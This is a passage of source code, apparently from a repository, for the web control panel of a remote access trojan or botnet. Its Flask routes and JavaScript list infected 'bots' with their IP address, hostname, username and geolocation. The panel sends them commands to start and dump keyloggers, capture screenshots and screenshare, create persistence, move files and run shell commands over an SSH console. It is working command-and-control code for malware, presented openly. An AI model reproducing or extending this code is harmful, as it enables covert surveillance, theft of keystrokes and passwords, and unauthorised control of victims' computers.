jsonify({"resp": ""}) return func(*args, **kwargs) wrapper.__name__ = func.__name__ return wrapper # Usernames & Passwords def is_valid_username(username): username = username.strip() resp = {"status": 0, "msg": ""} if len(username) == 0: return resp if len(username) < const.MIN_USERNAME_LENGTH: resp["msg"] = ( "Username must contain at least " + const.MIN_PASSWORD_LENGTH + " characters" ) return resp elif len(username) > const.MAX_USERNAME_LENGTH: resp["msg"] = ( "Username must contain at most " + const.MAX_USERNAME_LENGTH + "characters" ) return resp if re.findall(r"\W", username): resp["msg"] = "Username must not contain a special or space character" return resp resp["status"] = 1 return resp def is_valid_password(password): _password = password password = password.strip() resp = {"status": 0, "msg": ""} if len(password) == 0: return resp # Length if len(password) < const.MIN_PASSWORD_LENGTH: resp["msg"] = ( "Password must contain at least " + const.MIN_PASSWORD_LENGTH + " characters" ) return resp elif len(password) > const.MAX_PASSWORD_LENGTH: resp["msg"] = ( "Password must contain at most " + const.MAX_PASSWORD_LENGTH + " characters" ) return resp # Diversity if re.findall(r"^\d+\d$", password): resp["msg"] = "Password must not only consist of numbers" return resp if not re.findall(r"\d", password): resp["msg"] = "Password must contain a number" return resp if not re.findall(r"\w", password): resp["msg"] = "Password must contain a letter" return resp # Spaces if re.findall(r"^\s|\s$", _password): resp["msg"] = "Password must not start or end with a space" return resp if not re.findall(r"\s", password): resp["msg"] = "Password must contain a space" return resp if re.findall(r"\s{2,}", password): resp["msg"] = "Password must not consist of consecutive spaces" return resp resp["status"] = 1 return resp # -------- Endpoints -------- # @app.route("/") def index(): if not "logged_in" in session: session["logged_in"] = False return render_template("index.html") if not session["logged_in"]: return render_template("index.html") return render_template("home.html") @app.route("/settings") @login_required def settings(): return render_template("settings.html") def start_bot_services(bot_id): if not "bot_id" in session or session["bot_id"] != bot_id: session["bot_id"] = bot_id server.interface.ssh_obj(bot_id) @app.route("/control/cmd", methods=["POST"]) @login_required @bot_required def control_cmd(): if not "cmd_id" in request.form or not "args[]" in request.form: return jsonify({"resp": "Supply both cmd_id and args[]"}) cmd_id = request.form["cmd_id"] args = request.form.getlist("args[]") if not cmd_id.isdigit(): return jsonify({"resp": "cmd_id must be an int type"}) if not "bot_id" in session: return jsonify({"resp": "A bot must be selected"}) if not get_bot(session["bot_id"]): return jsonify({"resp": ""}) resp = server.interface.execute_cmd_by_id(session["bot_id"], cmd_id, args) return jsonify({"resp": resp}) @app.route("/control/ssh", methods=["POST"]) @login_required @bot_required def control_ssh(): if not "cmd" in request.form: return jsonify({"resp": "Please provide cmd argument"}) cmd = request.form["cmd"].strip() if not "bot_id" in session: return jsonify({"resp": "A bot must be selected"}) if not get_bot(session["bot_id"]): return jsonify({"resp": ""}) return jsonify({"resp": server.interface.ssh_exe(cmd)}) @app.route("/get-bot-info", methods=["POST"]) @login_required def get_bot_info(): if not "bot-id" in request.form: return jsonify({"status": -1, "msg": "bot-id is required"}) bot_id = request.form["bot-id"] bot = server.interface.get_bot(bot_id) if not bot: return jsonify({"status": -1, "msg": "No bot is available by that id"}) start_bot_services(bot_id) net_info = bot["intel"]["net_info"] sys_info = bot["intel"]["sys_info"] data = { "system": { "OS": sys_info["system"] + " " + sys_info["release"], "OS Version": sys_info["version"], "Hostname": sys_info["hostname"], "Username": sys_info["username"].title(), }, "network": { "ISP": net_info["isp"].title(), "Internal IP": net_info["internalIp"], "External IP": net_info["query"], }, "geolocation": { "Country": net_info["country"].title(), "Region": net_info["regionName"].title(), "City": net_info["city"].title(), "Zip": net_info["zip"], "Latitude": net_info["lat"], "Longitude": net_info["lon"], "Timezone": net_info["timezone"], }, } return jsonify({"status": 0, "data": data}) @app.route("/fetch-bots", methods=["GET"]) @login_required def fetch_bots(): online_bots = [] bots = server.interface.bots for bot in bots: online_bots.append( { "id": bots[bot]["bot_id"], "ip": bots[bot]["intel"]["net_info"]["query"], "os": bots[bot]["intel"]["sys_info"]["system"], "country": bots[bot]["intel"]["net_info"]["country"], } ) return jsonify({"bots": online_bots, "signature": server.interface.sig}) @app.route("/server-status", methods=["GET"]) @login_required def server_status(): status = {"isActive": server.is_active} if server.is_active: status["ip"] = server.ip status["port"] = server.port return jsonify(status) @app.route("/get-account-status", methods=["GET"]) @login_required def get_default_creds_status(): status = { "msg": db.get_account_status(session["user_id"], session["username"]) } return jsonify(status) @app.route("/update-username-password", methods=["POST"]) @login_required def update_username_password(): resp = { "new-username": {"status": 0, "msg": ""}, "current-password": {"status": 0, "msg": ""}, "new-password": {"status": 0, "msg": ""}, "confirm-password": {"status": 0, "msg": ""}, } if ( not "newUsername" in request.form or not "currentPassword" in request.form or not "newPassword" in request.form or not "confirmPassword" in request.form ): return jsonify({"resp": "Please provide all argument"}) new_username = request.form["newUsername"] current_password = request.form["currentPassword"] new_password = request.form["newPassword"] confirm_password = request.form["confirmPassword"] if len(current_password) == 0 and len(new_username) == 0: return jsonify(resp) new_password_resp = is_valid_password(new_password) new_username_resp = is_valid_username(new_username) if len(current_password): if not db.compare_passwords(session["user_id"], current_password): resp["current-password"][ "msg" ] = "Please provide the correct password" else: if new_password_resp["status"] == 0: resp["new-password"]["msg"] = new_password_resp["msg"] else: if new_password != confirm_password: resp["confirm-password"]["msg"] = "Passwords do not match" else: db.update_password(session["user_id"], new_password) resp["new-password"]["msg"] = "Password has been updated" resp["new-password"]["status"] = 1 if len(new_username): if new_username_resp["status"] == 0: resp["new-username"]["msg"] = new_username_resp["msg"] else: if not db.account_exists(new_username): db.update_username(session["user_id"], new_username) resp["new-username"]["msg"] = "Username has been updated" session["username"] = new_username.lower() resp["new-username"]["status"] = 1 else: resp["new-username"]["msg"] = "Must be a new username" session["account_status"] = db.get_account_status( session["user_id"], session["username"] ) return jsonify(resp) def valid_ip(ip): if not re.match( r"^(?!0)(?!.*\.$)((1?\d?\d|25[0-5]|2[0-4]\d)(\.|$)){4}$", ip ): return False if ip != const.PRIVATE_IP: return False return True def valid_port(port): _port = str(port).strip() if not len(_port): return False else: # check if number for item in _port: if not item.isdigit(): return False # check if number starts with a zero if int(_port[0]) == 0: return False # check if number is larger than 65535 if int(_port) > 65535: return False if any([int(_port) == const.FTP_PORT, int(_port) == const.SSH_PORT]): return False return True def server_start(ip, port): session["ip"] = ip session["port"] = port session["server_active"] = True return server.start(ip, port) def server_stop(): session["ip"] = None session["port"] = None session["server_active"] = False return not server.stop() @app.route("/start-server", methods=["POST"]) @login_required def start_server(): if not "ip" in request.form or not "port" in request.form: return jsonify({"status": -1, "msg": "Provide an IP and a Port"}) ip = request.form["ip"] port = request.form["port"] if not valid_ip(ip): return jsonify({"status": -1, "msg": "Invalid IP"}) if not valid_port(port): return jsonify({"status": -1, "msg": "Invalid port"}) if not server.is_active or not session["server_active"]: if server_start(ip, port): return jsonify({"status": 0, "msg": "Successfully started server"}) return jsonify({"status": -1, "msg": "Failed to start server"}) return jsonify({"status": -1, "msg": "Server is already active"}) @app.route("/stop-server", methods=["POST"]) @login_required def stop_server(): if server.is_active or session["server_active"]: if server_stop(): return jsonify({"status": 0, "msg": "Successfully stopped server"}) return jsonify({"status": -1, "msg": "Failed to stop server"}) return jsonify({"status": -1, "msg": "Server is already inactive"}) @app.route("/login", methods=["GET", "POST"]) def login(): if not "logged_in" in session: return redirect(url_for("index")) if session["logged_in"]: return redirect(url_for("index")) if not ("username" in request.form and "password" in request.form): return jsonify( {"is_authenticated": False, "msg": "Provide all requirements"} ) username = escape(request.form.get("username").strip()) password = escape(request.form.get("password")) if not len(username) or not len(password): return jsonify( { "is_authenticated": False, "msg": "Username and password required", } ) # attempt to login user_id = db.authenticate(username, password) if not user_id: return jsonify( {"is_authenticated": False, "msg": "Incorret username or password"} ) session["logged_in"] = True session["user_id"] = user_id session["username"] = username.title() # server session["server_active"] = False session["port"] = None session["ip"] = None if server.is_active: server_start(server.ip, server.port) session["account_status"] = db.get_account_status(user_id, username) return jsonify({"is_authenticated": True, "msg": ""}) @app.route("/logout") @login_required def logout(): session.clear() return redirect(url_for("index")) if __name__ == "__main__": WEB_SERVER_IP = "127.0.0.1" WEB_SERVER_PORT = 5000 # start server app.run(host=WEB_SERVER_IP, port=WEB_SERVER_PORT) # stop server server.stop() ================================================ FILE: requirements.txt ================================================ mss==3.2.1 pynput==1.6.6 Flask==2.1.0 bcrypt==3.1.7 requests==2.22.0 Flask-WTF==0.14.3 pyOpenSSL==22.0.0 PyInstaller==3.6 pycryptodome==3.9.6 jinja2<3.1.0 werkzeug==2.0.3 ================================================ FILE: static/css/control.css ================================================ @import url('home.css'); #cmd-line { width: 90%; height: 75%; margin: 0 auto; margin-top: 10px; white-space: pre; overflow-x: auto; padding: 0.8% 0.5%; border-radius: 3.5px; color: var(--white-smoke); background-color: var(--bg-color); border: 1px solid var(--white-smoke); } #cmd-input, #console { outline: none; margin-top: 2%; margin-left: 5%; padding: 5px 0.7%; text-align: center; border-radius: 2.5px; font-family: inconsolata; color: var(--white-smoke); background-color: var(--bg-color); border: 1px solid var(--white-smoke); } #cmd-input:focus, #console:focus { text-align: left; } #cmd-line, #cmd-input, #console { font-size: 14px; font-family: inconsolata; } #cmd-load, #console-load { width: 80px; height: 80px; display: none; margin-left: 4%; } ================================================ FILE: static/css/home.css ================================================ @import url('main.css'); .table-container { padding-left: 1px !important; height: 176px; overflow-y: scroll; border: solid 3px var(--hd-color); } table { width: 100%; margin: auto; font-size: 11.8px; table-layout: fixed; font-family: comfortaa; background-color: var(--hd-color) !important; } table th { padding: 0.7%; font-size: 11px; background-color: var(--bg-color); } .clickable:hover { cursor: pointer; text-decoration: underline; } .status-row { margin-right: 10px; } .status-value { font-family: rich; margin-left: 5px; color: var(--warning); } #server-control-section { height: 145px; text-align: center; padding: 0.1em 0.3em; background-color: var(--hd-color); } #server-config-section { width: 80%; margin: 15px auto; } #server-config-section input { font-family: rich; text-align: center; line-height: 2; width: 142px; border-radius: 3px; border: none; outline: none; } #server-control-section button, #server-config-section input { font-size: 14px; } #server-config-section input:disabled { background-color: #f9f9f9; } .console { border: 1px solid var(--hd-color); background-color: var(--hd-color); } .console-display { margin: 10px 0.5em; height: 406px; border: 1px solid #fff; background-color: var(--bg-color); padding: 5px 0.7%; font-family: inconsolata; overflow-y: auto; } .console-input-container { width: 100%; display: block; } .console-input-container span:first-child::before { content: var(--console-input-sym); } #console-input { width: 91%; color: #fff; background-color: transparent; outline: none; cursor: default; border: none; } .console-output-input-cmd, #console-input.disabled-console-input, .disabled-console-input span:first-child::before { color: var(--console-input-disabled-color); } #console-output { white-space: pre; line-height: 1.3; } .console-output-input-cmd::before { content: var(--console-input-sym); } .console-output-input-cmd::before, .console-input-container span:first-child::before { font-weight: bold; } .console-output-output { margin-top: 12px; display: block; } #info-display { height: 469px; overflow-y: auto; background-color: var(--hd-color); padding: 0.5em 5px; padding-top: 0.7em; } .info-section { margin-bottom: 1em; } .info-section:first-child { margin-top: 0.2em; } .info-section:last-child { margin-bottom: 0.6em; } .info-section-title { font-size: 1.2em; margin-bottom: 0.5em; display: block; } .info-row { margin-top: 0; margin-left: 1.3em; display: block; line-height: 1.4; } .info-row-title { font-weight: 600; font-size: 13.8px; } .info-row-title::after { content: ' : '; font-size: 15px; font-family: rich; } .info-row-value { padding-left: 3px; color: var(--warning); font-size: 13px; } ================================================ FILE: static/css/index.css ================================================ @import url('main.css'); #logo { color: #fff; display: block; margin-top: 10%; font-size: 40px; margin-bottom: 10px; } #form input { font-size: 14px !important; font-family: comfortaa; } #form input:hover { cursor: pointer; } #form input:focus { cursor: text; text-align: left !important; } #login-box > form > input { width: 75%; outline: none; padding-left: 5px; text-align: center; line-height: 2.5em; font-family: comfortaa; border: 1px solid transparent; border-radius: var(--border-radius); } #username:focus, #password:focus { text-align: left; border: 1px solid var(--bg-color); } #login { color: #fff !important; background-color: #222 !important; } #login:hover { background-color: #3b3b3b !important; } ================================================ FILE: static/css/intel.css ================================================ @import url('home.css'); ================================================ FILE: static/css/main.css ================================================ @charset "utf-8"; * { padding: 0; margin: 0; } html, body { height: 100%; display: flex; flex-direction: column; } body > * { flex-shrink: 0; } :root { --border-radius: 2.5px; --hot-red: #ff0033; --dark-red: #dc3545; --hd-color: #1f1f1f; --tab-color: #2f2f2f; --white-smoke: #f9f9f9; --bg-color: #101010; --tab-hover: #0f0f0f; --console-input-sym: '$> '; --console-input-disabled-color: #afafaf; } body { color: #fff !important; background-color: var(--bg-color); } /* Sidebar */ #sidebar { background-color: var(--hd-color); width: 140px; } #sidebar li, .console .tab { background-color: var(--tab-color); } .tab:hover, #sidebar li:hover, .active-sidebar-tab, .active-tab { background-color: var(--tab-hover) !important; } .tab span, .active-tab span, #sidebar li a, #sidebar li:hover a, .active-sidebar-tab a { color: #fff !important; } #sidebar a.nav-link { width: 102.8px; text-align: center; } .tab { width: 5.5rem; text-align: center; margin-right: 0.3em; } li.tab.disabled-tab, li.tab.disabled-tab:hover { background-color: var(--tab-color) !important; cursor: default !important; } .tab span { padding: 0.4rem 0.5rem !important; } .tab:hover { cursor: pointer; } #display-area { background-color: var(--bg-color); color: #fff; } #sidebar, #display-area { height: 100%; font-size: 13.8px; min-height: 92.714vh; } .logo { font-family: rich; } .navbar, .content-container { background-color: var(--hd-color); } .nav-tabs { border: none; } .nav-tabs .nav-link { border: none !important; border-top-left-radius: 0; border-top-right-radius: 0; margin-right: 2.4px; } .nav-tabs a.nav-link:hover { background-color: var(--bg-color); } .nav-tabs a.nav-link.active { background-color: var(--bg-color) !important; } #logout { background-color: var(--hot-red); } #logout:hover { background-color: var(--dark-red); } .invalid { outline: none; border: 2px solid; border-color: var(--dark-red) !important; box-shadow: 0 0 5px 2px var(--dark-red); } #notice { font-size: 15px; text-align: center; font-style: oblique; color: var(--hot-red); font-family: comfortaa; } ::-webkit-scrollbar { width: 2.5px; height: 2.5px; } ::-webkit-scrollbar-track { background: rgba(0, 0, 0, 0.1); } ::-webkit-scrollbar-thumb { background-color: #fff; } @font-face { font-family: rich; src: url(../font/aldrich.ttf); } @font-face { font-family: comfortaa; src: url(../font/comfortaa.ttf); } @font-face { font-family: inconsolata; src: url(../font/inconsolata.ttf); } ================================================ FILE: static/css/settings.css ================================================ @import url('main.css'); #account-update-container { height: 404px; background-color: var(--hd-color); } #new-username { border: none; text-transform: lowercase; } ================================================ FILE: static/js/command.js ================================================ 'use strict'; const commands = { reconnect: { id: 2, help: 'Force the remote computer to reconnect', usage: 'reconnect' }, disconnect: { id: 7, help: 'Force the remote computer to disconnect', usage: 'disconnect' }, screenshot: { id: 5, help: 'Capture a screenshot', usage: '\t\tscreenshot' }, logger_start: { id: 12, help: 'Start keylogging', usage: '\t\t\tlogger_start' }, logger_stop: { id: 13, help: 'Stop keylogging', usage: '\t\t\tlogger_stop' }, logger_dump: { id: 14, help: 'Display keystrokes', usage: '\t\tlogger_dump' }, chrome: { id: 6, help: 'Launch Chrome browser', usage: '\t\t\tchrome ' }, persist_create: { id: 8, help: 'Create persistence', usage: '\t\t\tpersist_create' }, persist_remove: { id: 9, help: 'Remove persistence', usage: '\t\t\tpersist_remove' }, screen_start: { id: 15, help: 'Start screenshare', usage: '\t\t\tscreen_start ' }, screen_stop: { id: 16, help: 'Stop screenshare', usage: '\t\tscreen_stop' }, screen_status: { id: 17, help: 'Status of screenshare', usage: '\t\t\tscreen_status' }, ftp_status: { id: 1, help: 'Check the status of a file transfer', usage: 'ftp_status' }, upload: { id: 3, help: 'Upload a file to the remote computer', usage: 'upload ' }, download: { id: 4, help: 'Downaload a file from the remote computer', usage: 'download ' } }; const CommandsEnum = { commands: 'commands', help: 'help' }; class Command extends Terminal { constructor() { Terminal.isSSH = false; super(); } get mainMenu() { return ( '

' + 'Type [command] + Enter' + '

' + '
    ' + "
  • 'help' -- display this list
  • " + "
  • 'cls' -- clear screeen
  • " + "
  • 'commands' -- display commands
  • " + '
' ); } get commands() { let displayed = false; let cmdOutput = ''; let command; for (let cmd in commands) { if (!displayed) { displayed = true; cmdOutput += '\t# --------[ Available Commands ]-------- #\n\n'; } command = commands[cmd]; cmdOutput += '\t' + cmd + '\t'.repeat(cmd.length < 8 ? 2 : 1) + command['help'] + '\t'.repeat(command['usage'].length < 15 ? 2 : 1) + command['usage'] + '\n'; } cmdOutput += '\n\tOverride a running process by using --override after the args\n' + '\tExample: download blueprint.pdf --override\n'; return cmdOutput; } getArgs(cmd) { let args = []; for (let n = 1; n < cmd.length; n++) { args[n - 1] = cmd[n]; } return args; } execute(cmd) { let _cmd = cmd.split(' '); let command = _cmd[0].toLowerCase(); let args = _cmd.length > 1 ? this.getArgs(_cmd) : [-1]; if (!(command in commands)) { if (command === CommandsEnum.commands) { this.stopExe(cmd, this.commands); return; } else if (command === CommandsEnum.help) { this.stopExe(cmd, ''); $('#console-output').append(terminalObj.mainMenu); this.scroll(); return; } this.stopExe(cmd, "'" + cmd.split(' ')[0] + "'" + ' is not recognized as a command'); return; } else { this.startExe(); } $.ajax({ type: 'POST', url: '/control/cmd', data: { cmd_id: commands[command]['id'], args: args }, beforeSend: request => { request.setRequestHeader('X-CSRFToken', $('#csrf_token').val()); } }) .done(resp => { let msg; if (resp['resp'].length !== 0) { msg = resp['resp']; } else { msg = 'Bot is not connected'; } if (!Terminal.isSSH) { this.stopExe(cmd, msg); } else { this.stopExe('', ''); } if (resp['resp'].length === 0) { disableConsole(); updateStatus(); } }) .fail(() => { this.stopExe(cmd, 'Failed to contact server'); }); } } ================================================ FILE: static/js/console.js ================================================ 'use strict'; const UP_CODE = 38; const DOWN_CODE = 40; const ENTER_CODE = 13; $(document).ready(function () { setServerStatusInactive(); }); $('.console-display').mouseup(() => { if (getSelectedText().length === 0) { $('#console-input').focus(); } }); function getSelectedText() { if (window.getSelection) { return window.getSelection().toString(); } else if (document.selection) { return document.selection.createRange().text; } return ''; } $('#console-input').keydown((e) => { if (terminalObj === null || terminalObj.processingCommand) { return; } let consoleHistory = terminalObj.consoleHistory; let keyCode = e.keyCode; let consoleInput = $('#console-input'); if (keyCode === UP_CODE || keyCode === DOWN_CODE || keyCode == ENTER_CODE) { e.preventDefault(); } if (e.keyCode === UP_CODE) { // Up if (terminalObj.currentPosition > 0) { terminalObj.currentPosition -= 1; consoleInput.val(consoleHistory[terminalObj.currentPosition]); } } else if (e.keyCode === DOWN_CODE) { // Down if (terminalObj.currentPosition < consoleHistory.length) { terminalObj.currentPosition += 1; consoleInput.val(consoleHistory[terminalObj.currentPosition]); } } else if (e.keyCode === ENTER_CODE) { let currentValue = consoleInput.val(); if (currentValue.trim().length == 0) { return; } updateHistory(currentValue); execute(currentValue); } }); $('#console-input').keyup(() => { terminalObj.currentInput = $('#console-input').val(); }); function execute(cmd) { if (cmd.toLowerCase() === 'cls') { $('#console-output').text(''); $('#console-input').val(''); terminalObj.scroll(); return; } terminalObj.execute(cmd); terminalObj.currentInput = ''; } function updateHistory(currentValue) { let historySize = terminalObj.consoleHistory.length; if (historySize >= MAX_HISTORY_SIZE) { historySize = historySize - 1; } if (historySize === 0) { terminalObj.addtoConsoleHistory(currentValue); historySize += 1; } else if (historySize !== 0) { if (terminalObj.consoleHistory[terminalObj.consoleHistory.length - 1] !== currentValue) { terminalObj.addtoConsoleHistory(currentValue); historySize += 1; } } terminalObj.currentPosition = historySize; } ================================================ FILE: static/js/exception.js ================================================ 'use strict'; class Exception { static get NotImplemented() { return 'NotImplementedError'; } } ================================================ FILE: static/js/home.js ================================================ 'use strict'; const botsFetchInterval = 10; // seconds let isFetchingBots = false; let isServerActive = false; let isProcessingBot = false; let isTogglingServer = false; let botsSignature = null; let terminalObj = null; $(document).ready(function () { updateStatus(); setInterval(updateStatus, botsFetchInterval * 1000); }); // Server function updateStatus() { getServerStatus() .done((resp) => { isServerActive = resp['isActive']; if (isServerActive) { $('#server-ip-display').text(resp['ip']); $('#server-port-display').text(resp['port']); $('#server-ip').val(resp['ip']); $('#server-port').val(resp['port']); setServerStatusActive(); } else { if ($('#server-ip-display').text() !== '----') { $('#server-ip-display').text('----'); $('#server-port-display').text('----'); setServerStatusInactive(); } } if (isTogglingServer) { isTogglingServer = false; $('#server-toggle-loader').addClass('d-none'); $('#server-active-toggle').removeClass('d-none'); } fetchBots(); }) .fail(() => { location.reload(); }); } function getServerStatus() { return $.ajax({ type: 'GET', url: '/server-status', beforeSend: (request) => { request.setRequestHeader('X-CSRFToken', $('#csrf_token').val()); }, }); } function setServerStatusActive() { $('#server-active-toggle').text('Stop Server'); $('#server-active-toggle').addClass('btn-danger'); $('#server-active-toggle').removeClass('btn-primary'); $('#server-ip').prop('disabled', true); $('#server-port').prop('disabled', true); } function setServerStatusInactive() { $('#server-active-toggle').text('Start Server'); $('#server-active-toggle').addClass('btn-primary'); $('#server-active-toggle').removeClass('btn-danger'); $('#server-ip').prop('disabled', false); $('#server-port').prop('disabled', false); disableConsole(); $('#bots-display').text(''); } $('#server-active-toggle').click(() => { if (isTogglingServer) { return; } isTogglingServer = true; let url = isServerActive ? '/stop-server' : '/start-server'; let data = !isServerActive ? { ip: $('#server-ip').val(), port: $('#server-port').val() } : {}; if ( !isServerActive && ($('#server-ip').val().trim().length === 0 || $('#server-port').val().trim().length === 0) ) { return; } $('#server-toggle-loader').removeClass('d-none'); $('#server-active-toggle').addClass('d-none'); $.ajax({ type: 'POST', url: url, data: data, beforeSend: (request) => { request.setRequestHeader('X-CSRFToken', $('#csrf_token').val()); }, }) .done((resp) => { updateStatus(); }) .fail(() => { isTogglingServer = false; $('#server-toggle-loader').addClass('d-none'); $('#server-active-toggle').removeClass('d-none'); }); }); // Bots function fetchBots() { if (isFetchingBots) { return; } $.ajax({ type: 'GET', url: '/fetch-bots', beforeSend: (request) => { request.setRequestHeader('X-CSRFToken', $('#csrf_token').val()); }, }) .done((resp) => { $('#bots-count').text(isServerActive ? resp['bots'].length : '----'); if (botsSignature === null || botsSignature !== resp['signature']) { botsSignature = resp['signature']; $('#bots-display').text(''); processBots(resp['bots']); } isFetchingBots = false; }) .fail(() => { isFetchingBots = false; }); } function processBots(bots) { let tableRow; if (bots == undefined) { location.reload(); } bots.forEach((bot) => { tableRow = $(''); tableRow.append( $('', { 'data-bot-id': bot['id'], class: 'clickable' }) .text(bot['id'].slice(0, 8)) .click((e) => { exploreBot(e.currentTarget.getAttribute('data-bot-id')); }) ); tableRow.append($('').text(bot['ip'])); tableRow.append($('').text(bot['os'])); tableRow.append($('').text(bot['country'])); $('#bots-display').append(tableRow); }); } function exploreBot(botId) { if (isProcessingBot) { return; } isProcessingBot = true; $.ajax({ type: 'POST', url: '/get-bot-info', data: { 'bot-id': botId }, beforeSend: (request) => { request.setRequestHeader('X-CSRFToken', $('#csrf_token').val()); }, }) .done((resp) => { $('#info-display').text(''); if (resp['status'] === 0) { let data = resp['data']; let sysInfo = $('
', { class: 'info-section' }); let netInfo = $('
', { class: 'info-section' }); let geoInfo = $('
', { class: 'info-section' }); sysInfo.append($('', { class: 'info-section-title' }).text('System')); netInfo.append($('', { class: 'info-section-title' }).text('Network')); geoInfo.append($('', { class: 'info-section-title' }).text('Geolocation')); // System sysInfo.append( $('', { class: 'info-row' }) .append($('', { class: 'info-row-title' }).text('ID')) .append($('', { class: 'info-row-value' }).text(botId.slice(0, 8))) ); for (let k in data['system']) { sysInfo.append( $('', { class: 'info-row' }) .append($('', { class: 'info-row-title' }).text(k)) .append($('', { class: 'info-row-value' }).text(data['system'][k])) ); } // Network for (let k in data['network']) { netInfo.append( $('', { class: 'info-row' }) .append($('', { class: 'info-row-title' }).text(k)) .append($('', { class: 'info-row-value' }).text(data['network'][k])) ); } // Geolocation for (let k in data['geolocation']) { geoInfo.append( $('', { class: 'info-row' }) .append($('', { class: 'info-row-title' }).text(k)) .append($('', { class: 'info-row-value' }).text(data['geolocation'][k])) ); } $('#info-display').append(sysInfo).append(netInfo).append(geoInfo); restTerminal(); terminalObj = new Command(); activateCommand($('#command')[0]); } isProcessingBot = false; }) .fail(() => { isProcessingBot = false; disableInput(); disabledTerminalObj(); }); } function restTerminal() { Terminal.commandOutputHistory = []; Terminal.SSHOutputHistory = []; Terminal.commandConsoleHistory = []; Terminal.commandCurrentPosition = 0; Terminal.SSHConsoleHistory = []; Terminal.SSHCurrentPosition = 0; Terminal.commandCurrentInput = ''; Terminal.SSHCurrenInput = ''; } $('#command').click((e) => { activateCommand(e.currentTarget); }); $('#ssh').click((e) => { activateSSH(e.currentTarget); }); function activateCommand(currentTab) { if (activateTab(currentTab) !== 0) { return; } if (terminalObj.constructor !== new Command().constructor) { terminalObj = new Command(); } } function activateSSH(currentTab) { if (activateTab(currentTab) !== 0) { return; } if (terminalObj.constructor !== new SSH().constructor) { terminalObj = new SSH(); } } function activateTab(currentTab) { if (terminalObj === null || isActiveTab(currentTab)) { return -1; } return activeTab(currentTab); } function activeTab(currentTab) { $(currentTab).addClass('active-tab'); $('.console ul.nav li').each((_, ele) => { if (ele !== currentTab) { $(ele).removeClass('active-tab'); } }); return 0; } function isActiveTab(currentTab) { return $(currentTab).hasClass('active-tab'); } ================================================ FILE: static/js/index.js ================================================ 'use strict'; $('#form').submit(e => { e.preventDefault(); let username = $('#username').val(); let password = $('#password').val(); if (username.length == 0 || password.length == 0) { return; } $.ajax({ type: 'POST', url: '/login', data: { username: username, password: password }, beforeSend: request => { request.setRequestHeader('X-CSRFToken', $('#csrf_token').val()); } }) .done(resp => { if (!resp['is_authenticated']) { $('#password').val(''); displayErrorMsg(resp['msg']); } else { window.location.href = '/'; } }) .fail(() => { window.location.href = '/'; }); }); function displayErrorMsg(msg) { let alert = $(''); let btn = $( '' ).append(''); alert.append('Error: ' + msg).append(btn); let alertContainer = $('#alert-container'); alertContainer.empty(); alertContainer.append(alert); } ================================================ FILE: static/js/settings.js ================================================ 'use strict'; const MIN_USERNAME_LENGTH = 4; const MAX_USERNAME_LENGTH = 16; const MIN_PASSWORD_LENGTH = 12; const MAX_PASSWORD_LENGTH = 256; let isProcessing = false; function isValidUsername(username) { username = username.trim(); let resp = { status: 0, msg: '' }; if (username.length === 0) { return resp; } if (username.length < MIN_USERNAME_LENGTH) { resp['msg'] = 'Username must contain at least ' + MIN_USERNAME_LENGTH + ' characters'; return resp; } else if (username.length > MAX_USERNAME_LENGTH) { resp['msg'] = 'Username must contain at most ' + MAX_USERNAME_LENGTH + ' characters'; return resp; } if (username.match(/\W/i)) { resp['msg'] = 'Username must not contain a special or space character'; return resp; } resp['status'] = 1; return resp; } function isValidPassword(password) { let _password = password; password = password.trim(); let resp = { status: 0, msg: '' }; if (password.length === 0) { return resp; } // Length if (password.length < MIN_PASSWORD_LENGTH) { resp['msg'] = 'Password must contain at least ' + MIN_PASSWORD_LENGTH + ' characters'; return resp; } else if (password.length > MAX_PASSWORD_LENGTH) { resp['msg'] = 'Password must contain at most ' + MAX_PASSWORD_LENGTH + ' characters'; return resp; } // Diversity if (password.match(/^\d+\d$/gm)) { resp['msg'] = 'Password must not only consist of numbers'; return resp; } if (!password.match(/\d/gm)) { resp['msg'] = 'Password must contain a digit'; return resp; } if (!password.match(/\w/)) { resp['msg'] = 'Password must contain a letter'; return resp; } // Spaces if (_password.match(/^\s|\s$/gm)) { resp['msg'] = 'Password must not start or end with a space'; return resp; } if (!password.match(/\s/gm)) { resp['msg'] = 'Password must contain a space'; return resp; } if (password.match(/\s{2,}/gm)) { resp['msg'] = 'Password must not have consecutive space'; return resp; } resp['status'] = 1; return resp; } function setInvalid(field, feedback) { field.removeClass('is-valid'); feedback.removeClass('valid-feedback'); field.addClass('is-invalid'); feedback.addClass('invalid-feedback'); } function setValid(field, feedback) { field.removeClass('is-invalid'); feedback.removeClass('invalid-feedback'); field.addClass('is-valid'); feedback.addClass('valid-feedback'); } function setClear(field, feedback) { field.removeClass('is-invalid'); field.removeClass('is-valid'); feedback.removeClass('invalid-feedback'); feedback.removeClass('valid-feedback'); feedback.text(''); } $('#new-username').keyup(() => { let resp = isValidUsername($('#new-username').val()); let feedback = $('#new-username-resp'); let field = $('#new-username'); if (resp['status'] === 0 && resp['msg'].length !== 0) { setInvalid(field, feedback); feedback.text(resp['msg']); } else if (resp['status'] === 0 && resp['msg'].length === 0) { setClear(field, feedback); } if (resp['status'] === 1) { setValid(field, feedback); feedback.text(''); } }); $('#new-password').keyup(() => { checkPassword(); checkConfirmPassword(); }); $('#confirm-password').keyup(() => { checkConfirmPassword(); }); function checkPassword() { let resp = isValidPassword($('#new-password').val()); let feedback = $('#new-password-resp'); let field = $('#new-password'); if (resp['status'] === 0 && resp['msg'].length !== 0) { setInvalid(field, feedback); feedback.text(resp['msg']); } else if (resp['status'] === 0 && resp['msg'].length === 0) { setClear(field, feedback); } if (resp['status'] === 1) { setValid(field, feedback); feedback.text(''); } } function checkConfirmPassword() { let feedback = $('#confirm-password-resp'); let field = $('#confirm-password'); if ($('#new-password').val().length === 0 || field.val().length === 0) { setClear(field, feedback); return; } if ($('#new-password').val() !== field.val()) { setInvalid(field, feedback); feedback.text('Passwords do not match'); } else { if ($('#new-password').val().length >= MIN_PASSWORD_LENGTH) { setValid(field, feedback); feedback.text(''); } } } $('#btn-update-username-password').click(() => { let newUsername = $('#new-username'); let currentPassword = $('#current-password'); let newPassword = $('#new-password'); let confirmPassword = $('#confirm-password'); if (currentPassword.val().length === 0 && newUsername.val().length === 0) { return; } let newPasswordResp = isValidPassword(newPassword.val()); let newUsernameResp = isValidUsername(newUsername.val()); if ( (newPasswordResp['status'] === 1 && newPassword.val() === $('#confirm-password').val()) || newUsernameResp['status'] === 1 ) { updateUsernamePassword(); } }); function updateUsernamePassword() { if (isProcessing) { return; } else { enableLoader(); isProcessing = true; } $.ajax({ type: 'POST', url: '/update-username-password', data: { newUsername: $('#new-username').val(), currentPassword: $('#current-password').val(), newPassword: $('#new-password').val(), confirmPassword: 